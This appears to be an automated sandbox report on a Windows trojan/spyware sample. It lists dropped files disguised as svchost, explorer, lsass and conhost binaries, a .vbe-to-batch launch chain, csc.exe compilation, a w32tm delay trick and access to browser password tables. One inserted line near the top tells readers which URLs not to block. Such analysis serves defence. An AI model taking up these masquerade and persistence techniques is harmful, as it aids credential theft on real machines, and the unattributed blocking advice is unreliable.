    00000015.00000002.3417373379.00000000133C7000.00000004.00000800.00020000.00000000.sdmp
    00000015.00000002.3417373379.0000000013B67000.00000004.00000800.00020000.00000000.sdmp
    00000015.00000002.3417373379.00000000128C8000.00000004.00000800.00020000.00000000.sdmp
Strings found in binary or memory (each reported verbatim; two of them are adjacent URLs with no separator between them, as they appear in memory):
    https://ac.ecosia.org/autocomplete?q=
    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    https://duckduckgo.com/ac/?q=
    https://duckduckgo.com/chrome_newtab
These are Chromium's built-in search-provider URL templates (search, suggest and favicon URLs for Ecosia, Yahoo and DuckDuckGo), i.e. browser configuration data held in this process's memory; they are not attacker infrastructure and should not be blocked as such.
                                    Source: conhost.exe, 00000015.00000002.3417373379.0000000012D30000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001332F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000138E7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012961000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012B49000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012C98000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012F81000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013028000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013CB6000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001397F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013147000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012AB0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013D4F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013797000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013517000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000135AF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000131E0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000136FF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000133C7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 
00000015.00000002.3417373379.0000000013B67000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000128C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                    Source: conhost.exe, 00000015.00000002.3417373379.0000000012D30000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001332F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000138E7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012961000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012B49000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012C98000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012F81000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013028000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013CB6000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001397F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013147000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012AB0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013D4F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013797000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013517000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000135AF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000131E0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000136FF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000133C7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 
00000015.00000002.3417373379.0000000013B67000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000128C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                                    Source: conhost.exe, 00000015.00000002.3417373379.0000000012D30000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001332F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000138E7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012961000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012B49000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012C98000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012F81000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013028000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013CB6000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001397F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013147000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012AB0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013D4F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013797000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013517000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000135AF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000131E0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000136FF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000133C7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 
00000015.00000002.3417373379.0000000013B67000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000128C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Window created: window name: CLIPBRDWNDCLASS

System Summary

Source: explorer.exe.0.dr Static PE information: section name: .'|?
Source: explorer.exe.0.dr Static PE information: section name: .h>&
Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 2_2_00836FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
Source: C:\blockhostnet\msinto.exe File created: C:\Windows\Globalization\Time Zone\backgroundTaskHost.exe
Source: C:\blockhostnet\msinto.exe File created: C:\Windows\Globalization\Time Zone\eddb19405b7ce1
Source: C:\blockhostnet\msinto.exe File created: C:\Windows\debug\explorer.exe
Source: C:\blockhostnet\msinto.exe File created: C:\Windows\debug\7a0fd90576e088
Source: C:\blockhostnet\msinto.exe File created: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe
Source: C:\blockhostnet\msinto.exe File created: C:\Windows\appcompat\d612fdb7e553d0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: c:\Windows\System32\CSCEBFD873D95F4D378C8CAFD01222E4F7.TMP
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: c:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File deleted: C:\Windows\System32\CSCEBFD873D95F4D378C8CAFD01222E4F7.TMP
Source: C:\Users\user\Desktop\Zn0uX5K1ez.exe Code function: 0_2_03441690
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 2_2_0083848E
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 2_2_00844088
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 2_2_008400B7
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 2_2_008340FE
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 2_2_008551C9
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 2_2_00847153
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 2_2_008462CA
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 2_2_008332F7
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 2_2_008443BF
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 2_2_0083C426
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 2_2_0085D440
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 2_2_0083F461
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 2_2_008477EF
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 2_2_0085D8EE
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 2_2_0083286B
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 2_2_0083E9B7
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 2_2_008619F4
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 2_2_00846CDC
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 2_2_00843E0B
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 2_2_00854F9A
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 2_2_0083EFE2
Source: C:\blockhostnet\msinto.exe Code function: 10_2_00007FFD348A0D4C
Source: C:\blockhostnet\msinto.exe Code function: 10_2_00007FFD348A0E43
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Code function: 21_2_00007FFD348C0000
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Code function: 21_2_00007FFD348B0D4C
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Code function: 21_2_00007FFD348B0E43
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Code function: 21_2_00007FFD348E1000
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Code function: 21_2_00007FFD348F1325
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Code function: 21_2_00007FFD348ED5CA
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Code function: 21_2_00007FFD34CA9DE0
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Code function: 21_2_00007FFD34CABB25
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe Code function: 24_2_00007FFD34880D4C
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe Code function: 24_2_00007FFD34880E43
Source: C:\Recovery\lsass.exe Code function: 26_2_00007FFD348B0D4C
Source: C:\Recovery\lsass.exe Code function: 26_2_00007FFD348B0E43
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Code function: 27_2_00007FFD348D1000
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Code function: 27_2_00007FFD348DD5CA
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Code function: 27_2_00007FFD348A0D4C
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Code function: 27_2_00007FFD348A0E43
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Code function: 27_2_00007FFD348B0000
Source: C:\Windows\debug\explorer.exe Code function: 28_2_00007FFD34890D4C
Source: C:\Windows\debug\explorer.exe Code function: 28_2_00007FFD34890E43
Source: C:\blockhostnet\msinto.exe Code function: 30_2_00007FFD348C0D4C
Source: C:\blockhostnet\msinto.exe Code function: 30_2_00007FFD348C0E43
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe Code function: 31_2_00007FFD348B0000
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe Code function: 31_2_00007FFD348D1000
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe Code function: 31_2_00007FFD348DD5CA
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe Code function: 31_2_00007FFD348A0D4C
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe Code function: 31_2_00007FFD348A0E43
Source: C:\Recovery\lsass.exe Code function: 32_2_00007FFD348B0D4C
Source: C:\Recovery\lsass.exe Code function: 32_2_00007FFD348B0E43
Source: C:\Recovery\lsass.exe Code function: 32_2_00007FFD348E1000
Source: C:\Recovery\lsass.exe Code function: 32_2_00007FFD348ED5CA
Source: C:\Recovery\lsass.exe Code function: 32_2_00007FFD348C0E06
Source: C:\Recovery\lsass.exe Code function: 32_2_00007FFD348C12F4
Source: C:\Recovery\lsass.exe Code function: 32_2_00007FFD348C1338
Source: C:\Recovery\lsass.exe Code function: 32_2_00007FFD348C0000
Source: C:\Recovery\lsass.exe Code function: 32_2_00007FFD348C137C
Source: C:\Recovery\lsass.exe Code function: 32_2_00007FFD348C13C0
Source: C:\Recovery\lsass.exe Code function: 32_2_00007FFD348C14A9
Source: C:\Recovery\lsass.exe Code function: 32_2_00007FFD348C1A7E
Source: C:\Recovery\lsass.exe Code function: 32_2_00007FFD348C13FD
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Code function: 33_2_00007FFD348A0D4C
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Code function: 33_2_00007FFD348A0E43
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Code function: 33_2_00007FFD348D1000
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Code function: 33_2_00007FFD348DD5CA
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Code function: 33_2_00007FFD348B0000
Source: C:\Windows\debug\explorer.exe Code function: 34_2_00007FFD348B0D4C
Source: C:\Windows\debug\explorer.exe Code function: 34_2_00007FFD348B0E43
Source: C:\Windows\debug\explorer.exe Code function: 34_2_00007FFD348C0E06
Source: C:\Windows\debug\explorer.exe Code function: 34_2_00007FFD348C12F4
Source: C:\Windows\debug\explorer.exe Code function: 34_2_00007FFD348C1338
Source: C:\Windows\debug\explorer.exe Code function: 34_2_00007FFD348C0000
Source: C:\Windows\debug\explorer.exe Code function: 34_2_00007FFD348C137C
Source: C:\Windows\debug\explorer.exe Code function: 34_2_00007FFD348C13C0
Source: C:\Windows\debug\explorer.exe Code function: 34_2_00007FFD348E1000
Source: C:\Windows\debug\explorer.exe Code function: 34_2_00007FFD348ED5CA
Source: C:\Windows\debug\explorer.exe Code function: 34_2_00007FFD348C14A9
Source: C:\Windows\debug\explorer.exe Code function: 34_2_00007FFD348C1A7E
Source: C:\Windows\debug\explorer.exe Code function: 34_2_00007FFD348C13FD
Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\AEdPygqV.log 2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: String function: 0084EC50 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: String function: 0084F5F0 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: String function: 0084EB78 appears 39 times
Source: Zn0uX5K1ez.exe, 00000000.00000000.2097208452.00000000012B2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamepayload.exe4 vs Zn0uX5K1ez.exe
Source: Zn0uX5K1ez.exe, 00000000.00000002.2111357651.00000000018FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Zn0uX5K1ez.exe
Source: Zn0uX5K1ez.exe Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs Zn0uX5K1ez.exe
Source: Zn0uX5K1ez.exe Binary or memory string: OriginalFilenamepayload.exe4 vs Zn0uX5K1ez.exe
Source: Zn0uX5K1ez.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: msinto.exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: backgroundTaskHost.exe.10.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@44/294@1/1
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 2_2_00836C74 GetLastError,FormatMessageW
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 2_2_0084A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
Source: C:\blockhostnet\msinto.exe File created: C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\conhost.exe
Source: C:\Users\user\Desktop\Zn0uX5K1ez.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Zn0uX5K1ez.exe.log
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7016:120:WilError_03
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-I0F3xOgXin83Nkym1lQr
Source: C:\Windows\debug\explorer.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6416:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4852:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5876:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5072:120:WilError_03
Source: C:\Users\user\Desktop\Zn0uX5K1ez.exe File created: C:\Users\user\AppData\Local\Temp\svchost.exe
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockhostnet\iXSXm.bat" "
Source: C:\Users\user\Desktop\Zn0uX5K1ez.exe Process created: C:\Users\user\AppData\Local\Temp\explorer.exe
Source: unknown Process created: C:\Windows\debug\explorer.exe
Source: unknown Process created: C:\Windows\debug\explorer.exe
Source: C:\Users\user\Desktop\Zn0uX5K1ez.exe Process created: C:\Users\user\AppData\Local\Temp\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Command line argument: sfxname 2_2_0084DF1E
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Command line argument: sfxstime 2_2_0084DF1E
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Command line argument: STARTDLG 2_2_0084DF1E
Source: Zn0uX5K1ez.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Zn0uX5K1ez.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.69%
Source: C:\Users\user\Desktop\Zn0uX5K1ez.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Zn0uX5K1ez.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: conhost.exe, 00000015.00000002.3554414073.000000001BE72000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3554414073.000000001BE6A000.00000004.00000020.00020000.00000000.sdmp, AzFu3DMnII.21.dr, KBpeOZl6LK.21.dr, 8B9aVxycY9.21.dr, 5QWAKoy45Q.21.dr, J3zegzBECf.21.dr, 9nUVX9qu0n.21.dr, UjjiqG5BgE.21.dr, lWE4TC1R9e.21.dr, TY8wXaUeS2.21.dr, mWJ8NP0pgg.21.dr, aUDfp3N2kY.21.dr, Vk3Mw1W2Qt.21.dr, VyJoKrdJMr.21.dr, wQGTEPWHw7.21.dr, B91mR4iHlu.21.dr, C24CrujGfu.21.dr, b8i0avu0ST.21.dr, OHWh9jYDpn.21.dr, QAJjLADhO2.21.dr, ak3B5ey2Im.21.dr, 1DxqRxk8bq.21.dr, Br1PSAOT8a.21.dr, jS9YrnT28m.21.dr, 5o7cJ7Im4F.21.dr, o10jWHG1nh.21.dr, g0LcWYZoL5.21.dr, U787fSRxaR.21.dr, HVm4DAR9Q6.21.dr, X1XyXuc1da.21.dr, psvsWE0Pyu.21.dr, eRmxc4BNpu.21.dr, 4OIxrbYGAr.21.dr, 0Vly4rb0Si.21.dr, 3XlCUqcTzr.21.dr, ILxWYyh7K0.21.dr, TK1GnnCPbs.21.dr, gus8gVV6Z1.21.dr, 9WjvQxChlE.21.dr, DXmKq18qjf.21.dr, gQ6v8ORoA0.21.dr, kLpULUaATZ.21.dr, ew1vPjSH17.21.dr, ZEEkdFsWOI.21.dr, nhADnqzdYk.21.dr, rcdCKsYyfx.21.dr, 6EGHrLU0vt.21.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Zn0uX5K1ez.exe ReversingLabs: Detection: 71%
Source: Zn0uX5K1ez.exe Virustotal: Detection: 73%
Source: unknown Process created: C:\Users\user\Desktop\Zn0uX5K1ez.exe "C:\Users\user\Desktop\Zn0uX5K1ez.exe"
Source: C:\Users\user\Desktop\Zn0uX5K1ez.exe Process created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe"
Source: C:\Users\user\Desktop\Zn0uX5K1ez.exe Process created: C:\Users\user\AppData\Local\Temp\explorer.exe "C:\Users\user\AppData\Local\Temp\explorer.exe"
Source: C:\Users\user\AppData\Local\Temp\explorer.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockhostnet\dbHnJe8FTGPofdGpjq0jOMhg.vbe"
Source: C:\Users\user\AppData\Local\Temp\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockhostnet\iXSXm.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\blockhostnet\msinto.exe "C:\blockhostnet/msinto.exe"
Source: C:\blockhostnet\msinto.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bpgiaqs4\bpgiaqs4.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB3CA.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC35F53CF7FFB422D917B12E88668AC1.TMP"
Source: C:\blockhostnet\msinto.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tcgkwiyn\tcgkwiyn.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB531.tmp" "c:\Windows\System32\CSCEBFD873D95F4D378C8CAFD01222E4F7.TMP"
Source: C:\blockhostnet\msinto.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\klrkJh2DBx.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe "C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\conhost.exe"
Source: unknown Process created: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe "C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe"
Source: unknown Process created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
Source: unknown Process created: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe "C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\conhost.exe"
Source: unknown Process created: C:\Windows\debug\explorer.exe "C:\Windows\debug\explorer.exe"
Source: unknown Process created: C:\blockhostnet\msinto.exe "C:\blockhostnet\msinto.exe"
Source: unknown Process created: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe "C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe"
Source: unknown Process created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
Source: unknown Process created: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe "C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\conhost.exe"
Source: unknown Process created: C:\Windows\debug\explorer.exe "C:\Windows\debug\explorer.exe"
Source: C:\Users\user\Desktop\Zn0uX5K1ez.exe Process created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe"
Source: C:\Users\user\Desktop\Zn0uX5K1ez.exe Process created: C:\Users\user\AppData\Local\Temp\explorer.exe "C:\Users\user\AppData\Local\Temp\explorer.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockhostnet\dbHnJe8FTGPofdGpjq0jOMhg.vbe" Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockhostnet\iXSXm.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\blockhostnet\msinto.exe "C:\blockhostnet/msinto.exe"Jump to behavior
